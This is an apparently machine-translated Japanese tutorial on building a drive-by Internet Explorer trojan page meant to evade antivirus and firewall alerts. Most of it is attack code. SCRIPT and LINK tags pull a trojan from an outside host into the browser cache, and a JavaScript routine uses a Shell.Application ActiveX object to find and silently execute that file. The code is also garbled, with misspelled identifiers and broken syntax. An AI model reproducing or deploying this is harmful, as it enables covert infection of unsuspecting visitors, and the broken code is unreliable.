完璧なIEのウェブページの木馬を製造します。


青い雪   ソース:第八軍団 
      完璧なIEページのトロイの木馬を構築するには、まず完璧な基準を制定する必要があります。個人的には完璧なIEページのトロイの木馬は少なくとも以下の4つの特徴を備えていると思います。  
一:ウイルス対策ソフトの追跡を避けることができます。  
二:ネットファイアウォールの警報を避けられます。  
三:多数のWINDOWSオペレーティングシステム(主にWIN 98、WINME、WIN 2000、WINXP、WIN 2003を含む)の中の多数のIEバージョン(主にIE 5.0、IE 5.5、IE 6.0を含む)に適用できます。  
閲覧者にIEの変化に気づきにくいようにすると、音もなく静かになるので、長い間発見されないようにすることができます。  
(上記の4つのポイントに注意してください。ページ自体を指しますが、あなたの木馬プログラムは含まれていません。つまり、私たちのウェブページの木馬は指定された木馬プログラムを実行するだけです。あなたの木馬プログラムの善し悪しは自分で選んでください。私に頼まないでください。書けないですよ。  
以上の4点を満足してこそ、あなたの馬をもっと若く、もっと速く走らせられると思います。  
上の何時を見たらドキドキしますか?焦らないでください。私達はとりあえず今持っている各種IEのウェブページの木馬の不足について話しましょう。  
第一種類:古いMIMEの穴を利用したIEページの木馬  
このような木馬はまだ流行していますが、この穴は古くて実用的なIEのバージョンが少ないため、当時の影響が大きすぎて、パッチがほとんど補充されました。このような木馬の栽培成功率は比較的低いです。  
第二種類:comp.ms.activeX.ActiveXComponentホールを利用して、WSHとFPOコントロールを結合するIEページの木馬  
comp.ms.activeX.ActiveXComponentは多数のIEバージョンに広く存在していますが、利用価値が非常に高いです。しかし、流行のウイルス呼び出しのWSHとFPOコントロールを合わせて、インターネットのファイアウォールの警報を避けることができますが、ウイルス対策ソフトの追跡を逃れられません。  
第三の種類:OBJECTオブジェクトタイプを利用して脆弱性を確認し、WSH及びFPOコントロールを結合したIEページの木馬(典型的には動鮫ページの木馬発生器を代表する)  
このような木馬の最大の長所は適応のIEバージョンが多くて、しかも穴が比較的に新しいですが、以下のような不足があります。  
1、この抜け穴はMshta.exeを呼び出して、インターネットに木馬プログラムをダウンロードします。だからファイアウォールの警報を引き起こします。  
2、もしこのIEのウェブページの木馬がまたWSHとFPOコントロールを利用したら、同じく駆除ソフトの追跡を逃れられません。  
動くザメのウェブページの木馬はまたちょうどWSHとFPOコントロールを使って、ため息をつく…残念ですね…?  
3、またこの脆弱性はASP、JSP、CGIなどのウェブサイトをサポートする必要があります。これはその発揮に影響を与えました。結局、今の無料で安定したダイナミックページの空間は少ないです。このバグはメールMIMEの形式を利用してもいいです。 Object データ データリモート実行の脆弱性の利用」http://www.xfocus.net/articles/200309/607.html)を利用したが、テストでIE 6.0には機能しないことが分かった。  
上の分析を見て、あなたはこのような感じがあったのではないでしょうか?千軍は得やすくて、1将は求めにくくて、馬は群れをなして、どうして千里の馬は探しにくいですか?焦らないでください。これを持って皆さんと一緒に私の心の中の完璧なIEページの木馬を作ります。  
まず、ウイルス対策ソフトの追撃を避けなければならない。WSHとFPOコントロールを利用して、WSHとFPOコントロールを利用すれば、必ず「ノートン」の追撃を逃れられないので、どうすればいいですか?焦らないでください。私の努力を通して(本当にASP木馬を研究する時に偶然発見した霊感です。)やっと使えるコントロールが見つかりました。 shell.appectionは、セキュリティ認証を経て、「マイコンピュータ」ドメインのウェブページで実行できます。WSHとFPOより実行権限が得られます。  
<SCRIPT LANGUAGE=「javascript」 type=「text/javascript」  
var shell=new ActiveXObject(「shell.appration」);  
shell.namespace(「c:\Windows\」).items().item(「Notepad.exe」).invokeverb();  
  
test.httmとして保存してから、自動的にメモ帳のプログラムが開かれているかどうかを確認してください。そしてWSHやFPOのように運行が許可されているメッセージボックスが現れないので、ちょっと興味がありますか?今はすでにすべての既知のパスを実行することができますが、自分たちのトロイの木馬プログラムを実行する必要がありますので、私たちのトロイの木馬プログラムを閲覧者のコンピュータにダウンロードして、その場所を見つける必要があります。私たちは一人で解決します。  
1、木馬プログラムをダウンロードして閲覧者のパソコンに行く  
この点は多くの解決方法があります。例えば、以前お話ししたWINDOWSがファイルのアクセスプロトコルを手伝って任意のファイル・ホールをダウンロードします。でも、今回はそれを使わないで、もっといいダウンロード方法を教えます。  
例一:SCRIPTタグを利用して、コードは以下の通りです。  
<SCRIPT LANGUAGE=「icyfoxlovelace」 src="http://www.godog.y365.com/wodemuma/icyfox.bat"  
ここのLANGUAGE属性はjavascript、VB Script、JScript以外の文字列でもいいです。漢字でもいいです。srcの属性はもちろん木馬プログラムの住所です。今は無料の空間が安全のため、exeファイルをアップロードできません。拡張子exeをbatまたはpif、scr、comに変更してもいいです。  
例二:LINKラベルを利用して、コードは以下の通りです。  
<LINK href="http://www.godog.y365.com/wodemuma/icyfox.bat「 rel=styless heet type=text/css>  
コードをタグの中間に置いて、href属性の値は木馬プログラムの住所です。  
上の二つは私が知っている最も良い二つの種類の木馬プログラムをダウンロードする方法です。それらのダウンロードしたプログラムは全部IEの臨時ディレクトリTemporaryに保存されます。 インターネット Filesディレクトリのサブディレクトリにあります。  
2、閲覧者の脳にダウンロードされた木馬プログラムのパスを見つける  
shell.apprationコントロールのいくつかの属性と方法を利用して、jsのエラー処理try{}catch(e){finally}文を結合して、再帰的にトロイの木馬プログラムを見つけるための経路を調整します。コードは以下の通りです。 機能 icyfoxlovelace(){  
//WINDOWSシステムディレクトリとシステムディスクを入手する  
url=document.location.href;  
xtmu=url.substring(6,url.indexOf('\',9)+1);  
xtp=url.substr(6,3)  
var shell=new ActiveXObject(「shell.appration」);  
var runbz=1;  
//ここで木馬プログラムのサイズを設定し、バイト単位で  
//198201を実際の木馬プログラムの大きさに変えてください。  
var exeSize=198201  
//木馬プログラム名と拡張子(exe,com,bat,pif,scr)を設定し、ダウンロードされた木馬プログラムかどうかを判断するために使用します。  
//下の二行の中のicyfoxをあなたの木馬プログラム名に変えてください。batをあなたの木馬プログラムの拡張子に変えてください。  
var a=/icyfox\\d*\.bat/gi;  
a.co.mpile("icyfox\\\\\\\\\\\\"\.bat","gi")  
var b=/[A-Za-z]:\/gi;  
b.com mpile(「-Za-z」:\\\\\」、「gi」)、//正規表現は、ディスクのルートディレクトリかどうかを判断するために使用されます。  
//下記のコードは木馬プログラムを検索して実行します。  
wjj(xtmu+「Temporary」 インターネット Files\\\")////Contentt.IE 5\if(runbz)wjj(xtp+"Dockments and Settings\\\";;  
if(runbz)yp();  
//すべてのハードディスクのパーティションでトロイの木馬プログラムを検索して実行します。  
機能 yp(){  
try{  
var c=new Enumerator(shell.namespace).PartFolder.Items();  
for (;!c.at End();c.moveNext(){  
if(runbz){if(b.test(c.item().path))wjj(c.item().path);  
else break;  
)  
}catch(e){}  
)  
//再帰的に指定されたディレクトリ(サブディレクトリを含む)でトロイの木馬プログラムを検索して実行する  
機能 wjj(b){  
try{  
var c=new Enumerator(shell.namespace(b).Items();  
for (;!c.at End();c.moveNext(){  
if(runz&&c.item().Size==exexeSize&a.test(c.item().path){  
var f=c.item().path;  
var v=f.lastIndexOf('\')+1;  
try{  
shell.namespace(f.substring(0,v).items().item(f.substr(v).invokeverb()//トロイの木馬プログラムを実行します  
runbz=0  
break;  
}catch(e){}  
)  
if(c.item().Size)wjj(c.item().path+「\」)サブディレクトリの場合は再帰的に呼び出します。  
)  
}catch(e){}  
)  
)  
icyfoxlovelace();  
以上のコードをicyfox.jsとして保存してください。